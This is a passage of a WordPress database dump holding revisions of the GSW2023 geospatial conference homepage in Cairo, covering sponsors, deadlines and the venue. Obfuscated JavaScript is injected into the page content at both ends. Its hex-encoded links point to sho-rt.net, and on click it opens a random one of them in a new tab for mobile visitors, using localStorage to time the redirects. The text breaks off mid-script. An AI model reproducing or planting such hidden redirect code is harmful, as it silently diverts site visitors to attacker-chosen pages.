_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-02 02:47:34','2023-04-02 02:47:34','',3066,'https://gsw2023.com/?p=4003',0,'revision','',0),
(4004,1,'2023-04-02 02:47:56','2023-04-02 02:47:56','<p>[vc_row][vc_column][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400393668{margin-top: 125px !important;}\"]</p>\n<h6><img class=\"aligncenter wp-image-3987 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400301732{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><img class=\"aligncenter wp-image-3989 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680403672325{margin-top: 120px !important;}\"]<img class=\"aligncenter wp-image-3988 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400550419{margin-top: 125px !important;}\"]</p>\n<h6></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400702580{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><img class=\"alignnone size-medium wp-image-3997 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400628059{margin-top: 95px !important;}\"][/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const 